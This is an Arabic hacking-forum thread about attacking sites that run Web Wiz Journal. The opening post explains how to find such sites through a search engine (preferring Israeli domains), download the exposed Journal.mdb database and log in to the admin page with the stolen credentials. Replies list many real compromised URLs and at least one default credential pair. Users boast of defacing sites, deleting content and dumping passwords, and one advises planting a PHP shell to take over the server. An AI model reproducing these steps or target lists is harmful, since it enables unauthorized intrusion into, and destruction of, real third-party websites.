((~*^$%هـكـــ 15 ـــرز%$^*~))
الكاتب : hihak15
البريد : hihak15@hotmail.com
((~*^$%هـكـــ 15 ـــرز%$^*~))
السلام عليكم

أرجوا عدم استخدام هذه الثغرة فيما حرمه الله وأنا أبرئ ذمتي من كل استخدام محرم ألا هل بلغت اللهم اشهد !!

أخواني الأعزاء وضعت هذه الثغرة من أجلكم فلا تخيبوا ظني وتخترقوا مواقع ما لها شغل برئية لازم يكون لها دافع

بسم الله نبدأ .. :p

اذهب الى أي محرك بحث ولنفرض www.google.com

اكتب web wiz Journal

والمفضل حتى تكون اسرائيلية
web wiz Journal co.il
web wiz Journal ac.il
web wiz Journal org.il
web wiz Journal gov.il
وغيره

المهم نختار الموقع /www.xxx.com/Journal

ونضيف Journal.mdb

بيصير كذا www.xxx.com/Journal/Journal.mdb

بيحمل عندك قاعدة البيانات وخذ الاسم والكلمة

وروح الى لوحة التحكم
www.xxx.com/Journal/admin.htm

وسلامتكم وأعود أقولها

لحد يخترق موقع منا والطريق لازم يكون فيه دافع وانا والله أبرئ ذمتي من كل استخدام محرم

هذا موقع انا جربت فيه ولا له داعي يخترق لهذا رجاااااء قلت رجااااء لحد يخترقه دور لك واحد غيره يستاهل
http://www.smarttrust.com/new/

تحياتي hihak15 |4||4||4|
((~*^$%هـكـــ 15 ـــرز%$^*~))
جميع الحقوق محفوظة لـ هـكـــ 15 ـــرز
((~*^$%هـكـــ 15 ـــرز%$^*~))

مع انها قديمه مرة لكن مشكور عليها وما ودنا نزعلك ...

:D

مشكور ويعطيك الف عافيه اخوي المتمكن ;)

أهلا وشكرا على الرد

ومهما تكون قديمة جديدة المهم أنني ما لقيتها في مكان انا من جرب ونجحت معي :p

يالله في امان الله |4||4|

مشكووووووووور على الثغرة;)
الله يعطيك العافية

احبك يامتمكن كثر منها والي يرحم والديك (صارلي يومين مومخترق شي )ايوا انت الحين
اقوللك تحياتي والف شكر والى الامام يامتمكن

هذا حصلته بالزحمه
ماادري منو


اسم غلط ومسجل في قاعدة البيانات صح
http://www.universalbreak.com/Journal/admin.htm

نفس الشي
http://forensicsx.net/blog/Journal/admin.htm

http://www.sdcbuggy.org/blogger/Journal


http://www.birta.dk/Journal/admin.htm

Username Password
admin nimda

ندخل من http://www.birta.dk/Journal/admin.htm

يقولي الاسم والباسوورد غلط

http://www.ctpcug.org/Journal/

:D:cool:
اشوه استفتحنا

يالله ياشباب

الشغل نار ...وينكم نايمين ماكفايه نوم ..

http://www.horntonhill.co.uk/Journal


http://perceptible.net/journal
www.hopecaravan.com/Journal

http://esong.averi.hr/dbase/journalesp/Journal

مشكوووووووووووووور..

وتحياتي لك..

هذا من شوق
<<<<<<صادوه
http://www.inothernews.net/Journal

هذا مني :::
http://www.ctpcug.org/journal/
http://aci.jeeran.com/images/1-Hac.gif

شوفوا هذا كماااااااااان..

http://perceptible.net/journal/

مبروك ياHackers وكثر منها ياسلام عليك

شووووووفووووووووا هذا كماااااااااان::

http://www.joshimitsu.com/journal

http://www.joshimitsu.com/

كاتب الرسالة الأصلية : خالد7
مبروك ياHackers وكثر منها ياسلام عليك

زين..

طيب ده

http://www.ucs.edu.my/asp/e_journal

http://nirvana.ntelos.net/index.asp
وده
skeddy.net/Journal

كاتب الرسالة الأصلية : خالد7

طيب ده
http://nirvana.ntelos.net/index.asp
وده
skeddy.net/Journal
مبرووووووووووووك..

لووووووووووووووووول مبروك اخواني ;)

انا دخلت على الثغرة هذي وقدرت اني ادخل موقع وتحكمت فيه وغيرت الواجهه وحطيت صفحتي index وحذفت كل مافيه بعد مااخترقت كل من منتداهم وغيره :p

وهذي هديه

http://www.veloclub.ch/blog/Journal/

http://magicmedia.dtdns.net/igis/journal/


http://www.svenskmediarekrytering.com/journal/


http://www.hangarz.com/blog/journal/admin.htm هاههههههههههههه:D



http://www.seamuffin.com/database/


http://www.predatornet.com/journal/


http://janti.avehosting.net/journal/



http://www.toetsentref.nl/evenementen/journal/



وهناك الكثير بس صراحه تعبت بروح انام |3|


تحياتي لكم

اخلعتيني ويا التوقيع هذا صرعني مافي امل اتغيرينا حطي اي توقيع ثاني بس هذا يخلع

على العموم
مبرووووووووووووووووووووووووووووووووووووووووووووووو ووووووووووووووك
لوول

طيب يامرعب وين الموقع اللي حذفت كل مافي :D:D
وينه
؟؟
يالله هذا مني
http://www.33bits.com.br/blog

|4||4|

تسلموا على الردود الحلوة

ومبرووووووووووووك للجميع اختراقاتهم

وألف شكر للأخ خالد 7 على هذا النشاط

تحياتي |4||4|

كاتب الرسالة الأصلية : خالد7
اخلعتيني ويا التوقيع هذا صرعني مافي امل اتغيرينا حطي اي توقيع ثاني بس هذا يخلع

على العموم
مبرووووووووووووووووووووووووووووووووووووووووووووووو ووووووووووووووك
لوول

طيب يامرعب وين الموقع اللي حذفت كل مافي :D:D
وينه
؟؟
يالله هذا مني
http://www.33bits.com.br/blog

|4||4|

__________________________________________________
هلا اخوي خالد انته سالت عن الموقع :p

هذا هو الموقع شف كيف اخترقته بالترتيب واخترقته لاني شفت فيه علم امريكي على يمين الصفحه :D

اول شى اخترقت صفحه بالثغرة Journal.mdb http://ccany.pantherco.com/Journal/


وثاني اختراق من الثغرة نفسها وشف وين وصلتني news http://ccany.pantherco.com/news/

وثالث اختراق للمنتدى حقهم forum
http://ccany.pantherco.com/forum/


واخر شى وصلت لوحه مااعرف وش هي حقه هذا عنوانها
http://ccany.pantherco.com/db_admin

المهم انا استعملت اسم صاحب الموقع قلت بجرب انه يدخلني على لوحه الفتب
ftp://ccany.pantherco.com

دخلت بس ماكنت اقدر اغير شى بس كنت اقدر احذف و طلعت كل الباسوردات حق المنتدى وغيره
وقلت بجرب اني ادخل على اللينك هذا
http://ccany.pantherco.com/admin.htm

وقدرت ادخل ادمنه وغيرت الباسورد وكل شى وحتى لو تلاحظ ياخالد على يسار الصفحه تحت اخر شى بتلاحظ كلمه Hacked by shooq انا حاطه ترشيح لنفسي هههههههاههههههه:D
http://ccany.pantherco.com
وتحياتي لك وارجو انك فهمت الحين ;)

بس ياليت حد يقولي وش معنى الصفحه هذي ؟؟؟؟
http://ccany.pantherco.com/db_admin


وتحياتي للجميع :)

مشكور المتمكن

ومبروووك للكل بالاختراقات :)

اهلا تاز وشكرا على الرد

اختي شوق مبروك وبإمكانك زرع phpshell يمكن تقدري تخترقي السيرفر

على فكرة الظاهر اللنك الي حطيته نوع من انواع لوحة التحكم مثل phpmyadmin

أنصحك باستخدام ws_ftp

تحياتي |4||4|

أولا : السلام عليكم جميعا

ثانيا : أنا مشترك بالأمس فقط ، لكن المنتدى عجبني جدا

أحب أقول إن الـ Journal لا تفتح رغم وضع اليوزر نيم والباسوورد
لسبب بسيط مكتوب أسفل صفحة دخول الأدمين

لاحظ : Session &@#&@#&@#&@#&@#&@#s must be enabled

طيب أنا أستخدم XP
وقد لا أعرف كيف أفعل الكوكيز

هل يدلني أحد ؟

اخوي ابو لينا

ليس السبب هو ما قلته

بس اعتقد ان الموقع الي جربت فيه

مقفل الثغرة اقصد يدري بوجودها

جرب في غيرها وان شاء الله تنجح

فمان الله|4|

سأحاول بمساعدتكم طبعا
وشكرا لتعاونكم

هاهاهاهااااااااااااي
بس حلوه حركة الترشيح
شفت نسبة الترشيح
75%
لووول


اها يعني مثل ماسوى هتلر لووول طيب
دخلتي ال
طيب الFTP تقدرين تحطين_ صفحه _فايل_ (ولا مايصير)؟

هذا ملف قاعدة بيانات http://ccany.pantherco.com/database\ccany.mdb
غير هذا
/Journal.MDB
اوكي افتحي الملف يمكن في اشياء مهمه علشان الجهاز اللي انا فيه حاليا مافي الacc
طيب
هذي
http://ccany.pantherco.com/db_admin/Frameset.asp

راح اقول اللي اعرفه :
تلاقي
Tables
Banners
Search
Properties
New Record
Chapters
Search
Properties
New Record
Events
Search
Properties
New Record
Feature
Search
Properties
New Record
News
Search
Properties
New Record
SideMenu
Search

في كل ملف ان كان اظغط على Properties
راح تلاقي الملفات احذفيه او غيري اساميهم
الصفحه هذي

http://ccany.pantherco.com/db_admin/DBDesignMSAccess.asp?ocdAction=NEWTABLE

لأضافة صفحه وانا ماودي اجرب عشان مااخرب
INDEX
اضغط على
SideMenu
راح اتشوفين مواقع .......وبجانبها delete

Edit.asp للتغيير .
وانشالله تكون الطريقه ناجحه ومفيده
على العموم
وصحيح مثل ماقال المتمكن
لوحة التحكم مثل phpmyadmin

وسلامتك

اخوي أبو لينا بالتوفيق

أخوي خالد 7 آخررررر حلاوة

معلومات قيمة وانتظر منا المزيد

فمان الله |4||4|

يسلمووووووو اخوي المتمكن

بس لما دخلت الكلمة والباسورد طلعلي



Sorry, you are not authorised to view the material in this part of the web site.

If you try again make sure you have session &@#&@#&@#&@#&@#&@#s enabled on your machine.

:confused:

بس اخوي الغالي ممكن تشرح كيف نغير الصفحه

:rolleyes:

حلووو يالمتمكن والله لو فضيت بخترق كم واحد بس مشغووول

تشاااااو

هذا عشانكم شباب كان واحد قبلي مخترقه شيعي بس ماارضى اشوف شيعي يخترق

http://prohydrofoiltour.com/journal/

تشاااااو

http://esong.averi.hr/dbase/journalesp/journal/

AN thanx

الف شكر لك يا متمكن يالغالي
والف مبرووك للي اخترقوا

وهذا اختراقي مو بس انتم :D


http://www.veloclub.ch/blog/journal/

أدعس يا ولد
وهذا واحد ثاني

http://www.ausmaiden.com/maiden/journal/

;)

<<<< ما ينقال له إنه فيه ثغره :D

هذا ثاني بعد
البركه فيك يالمتمكن :)

http://www.novadigital.net/journal/

اش قصدك بالاسم او الكلمة الي نا خذا من الداتا بيس



ما فهمت ......معليش اتحملونااااااااا